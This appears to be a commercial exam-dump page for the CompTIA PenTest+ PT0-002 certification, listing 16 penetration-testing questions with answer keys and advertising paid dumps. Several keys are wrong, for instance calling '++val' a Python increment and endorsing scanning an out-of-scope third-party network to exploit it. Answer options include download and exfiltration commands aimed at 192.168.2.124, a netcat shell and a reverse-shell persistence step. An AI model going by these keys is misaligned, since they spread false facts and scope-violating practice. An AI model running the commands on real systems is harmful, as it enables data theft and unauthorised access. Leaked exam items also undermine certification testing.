2022 New PT0-002 Exam Dumps with PDF and VCE Free: https://www.2passeasy.com/dumps/PT0-002/

It is impossible to pass CompTIA PT0-002 exam without any help in the short term. Come to Actualtests soon and find the most advanced, correct and guaranteed CompTIA PT0-002 practice questions. You will get a surprising result by our Abreast of the times CompTIA PenTest+ Certification Exam practice guides.

CompTIA PT0-002 Free Dumps Questions Online, Read and Test Now.

NEW QUESTION 1
A penetration tester ran a ping –A command during an unknown environment test, and it returned a 128 TTL packet. Which of the following OSs would MOST likely return a packet of this type?

  • A. Windows
  • B. Apple
  • C. Linux
  • D. Android

Answer: A

NEW QUESTION 2
A penetration tester has gained access to a network device that has a previously unknown IP range on an interface. Further research determines this is an always-on VPN tunnel to a third-party supplier.
Which of the following is the BEST action for the penetration tester to take?

  • A. Utilize the tunnel as a means of pivoting to other internal devices.
  • B. Disregard the IP range, as it is out of scope.
  • C. Stop the assessment and inform the emergency contact.
  • D. Scan the IP range for additional systems to exploit.

Answer: D

NEW QUESTION 3
A new security firm is onboarding its first client. The client only allowed testing over the weekend and needed the results Monday morning. However, the assessment team was not able to access the environment as expected until Monday. Which of the following should the security company have acquired BEFORE the start of the assessment?

  • A. A signed statement of work
  • B. The correct user accounts and associated passwords
  • C. The expected time frame of the assessment
  • D. The proper emergency contacts for the client

Answer: B

NEW QUESTION 4
A penetration tester has obtained a low-privilege shell on a Windows server with a default configuration and now wants to explore the ability to exploit misconfigured service permissions. Which of the following commands would help the tester START this process?

  • A. certutil–urlcache –split –f http://192.168.2.124/windows-binaries/ accesschk64.exe
  • B. powershell(New-Object System.Net.WebClient).UploadFile(‘http://192.168.2.124/ upload.php’, ‘systeminfo.txt’)
  • C. schtasks /query /fo LIST /v | find /I “Next Run Time:”
  • D. wgethttp://192.168.2.124/windows-binaries/accesschk64.exe –O accesschk64.exe

Answer: B

NEW QUESTION 5
A penetration tester would like to obtain FTP credentials by deploying a workstation as an on-path attack between the target and the server that has the FTP protocol. Which of the following methods would be the BEST to accomplish this objective?

  • A. Wait for the next login and perform a downgrade attack on the server.
  • B. Capture traffic using Wireshark.
  • C. Perform a brute-force attack over the server.
  • D. Use an FTP exploit against the server.

Answer: B

NEW QUESTION 6
A security company has been contracted to perform a scoped insider-threat assessment to try to gain access to the human resources server that houses PII and salary data. The penetration testers have been given an internal network starting position.
Which of the following actions, if performed, would be ethical within the scope of the assessment?

  • A. Exploiting a configuration weakness in the SQL database
  • B. Intercepting outbound TLS traffic
  • C. Gaining access to hosts by injecting malware into the enterprise-wide update server
  • D. Leveraging a vulnerability on the internal CA to issue fraudulent client certificates
  • E. Establishing and maintaining persistence on the domain controller

Answer: B

NEW QUESTION 7
Which of the following describe the GREATEST concerns about using third-party open-source libraries in application code? (Choose two.)

  • A. The libraries may be vulnerable
  • B. The licensing of software is ambiguous
  • C. The libraries’ code bases could be read by anyone
  • D. The provenance of code is unknown
  • E. The libraries may be unsupported
  • F. The libraries may break the application

Answer: AC

NEW QUESTION 8
A penetration tester recently completed a review of the security of a core network device within a corporate environment. The key findings are as follows:
• The following request was intercepted going to the network device: GET /login HTTP/1.1
Host: 10.50.100.16
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:31.0) Gecko/20100101 Firefox/31.0 Accept-Language: en-US,en;q=0.5
Connection: keep-alive
Authorization: Basic WU9VUilOQU1FOnNlY3JldHBhc3N3b3jk
• Network management interfaces are available on the production network.
• An Nmap scan returned the following:
PT0-002 dumps exhibit
Which of the following would be BEST to add to the recommendations section of the final report? (Choose two.)

  • A. Enforce enhanced password complexity requirements.
  • B. Disable or upgrade SSH daemon.
  • C. Disable HTTP/301 redirect configuration.
  • D. Create an out-of-band network for management.
  • E. Implement a better method for authentication.
  • F. Eliminate network management and control interfaces.

Answer: CE

NEW QUESTION 9
A penetration tester who is doing a security assessment discovers that a critical vulnerability is being actively exploited by cybercriminals. Which of the following should the tester do NEXT?

  • A. Reach out to the primary point of contact
  • B. Try to take down the attackers
  • C. Call law enforcement officials immediately
  • D. Collect the proper evidence and add to the final report

Answer: A

NEW QUESTION 10
A company conducted a simulated phishing attack by sending its employees emails that included a link to a site that mimicked the corporate SSO portal. Eighty percent of the employees who received the email clicked the link and provided their corporate credentials on the fake site. Which of the following recommendations would BEST address this situation?

  • A. Implement a recurring cybersecurity awareness education program for all users.
  • B. Implement multifactor authentication on all corporate applications.
  • C. Restrict employees from web navigation by defining a list of unapproved sites in the corporate proxy.
  • D. Implement an email security gateway to block spam and malware from email communications.

Answer: A

NEW QUESTION 11
A client has requested that the penetration test scan include the following UDP services: SNMP, NetBIOS, and DNS. Which of the following Nmap commands will perform the scan?

  • A. nmap –vv sUV –p 53, 123-159 10.10.1.20/24 –oA udpscan
  • B. nmap –vv sUV –p 53,123,161-162 10.10.1.20/24 –oA udpscan
  • C. nmap –vv sUV –p 53,137-139,161-162 10.10.1.20/24 –oA udpscan
  • D. nmap –vv sUV –p 53, 122-123, 160-161 10.10.1.20/24 –oA udpscan

Answer: B

NEW QUESTION 12
A penetration tester wants to scan a target network without being detected by the client’s IDS. Which of the following scans is MOST likely to avoid detection?

  • A. nmap –p0 –T0 –sS 192.168.1.10
  • B. nmap –sA –sV --host-timeout 60 192.168.1.10
  • C. nmap –f --badsum 192.168.1.10
  • D. nmap –A –n 192.168.1.10

Answer: B

NEW QUESTION 13
User credentials were captured from a database during an assessment and cracked using rainbow tables. Based on the ease of compromise, which of the following algorithms was MOST likely used to store the passwords in the database?

  • A. MD5
  • B. bcrypt
  • C. SHA-1
  • D. PBKDF2

Answer: A

NEW QUESTION 14
A penetration tester has obtained root access to a Linux-based file server and would like to maintain persistence after reboot. Which of the following techniques would BEST support this objective?

  • A. Create a one-shot systemd service to establish a reverse shell.
  • B. Obtain /etc/shadow and brute force the root password.
  • C. Run the nc -e /bin/sh <...> command.
  • D. Move laterally to create a user account on LDAP

Answer: A

Explanation:
https://hosakacorp.net/p/systemd-user.html

NEW QUESTION 15
Which of the following expressions in Python increase a variable val by one (Choose two.)

  • A. val++
  • B. +val
  • C. val=(val+1)
  • D. ++val
  • E. val=val++
  • F. val+=1

Answer: DF

NEW QUESTION 16
A penetration tester is testing a web application that is hosted by a public cloud provider. The tester is able to query the provider’s metadata and get the credentials used by the instance to authenticate itself. Which of the following vulnerabilities has the tester exploited?

  • A. Cross-site request forgery
  • B. Server-side request forgery
  • C. Remote file inclusion
  • D. Local file inclusion

Answer: B

NEW QUESTION 17
......

Thanks for reading the newest PT0-002 exam dumps! We recommend you to try the PREMIUM Dumpscollection.com PT0-002 dumps in VCE and PDF here: https://www.dumpscollection.net/dumps/PT0-002/ (110 Q&As Dumps)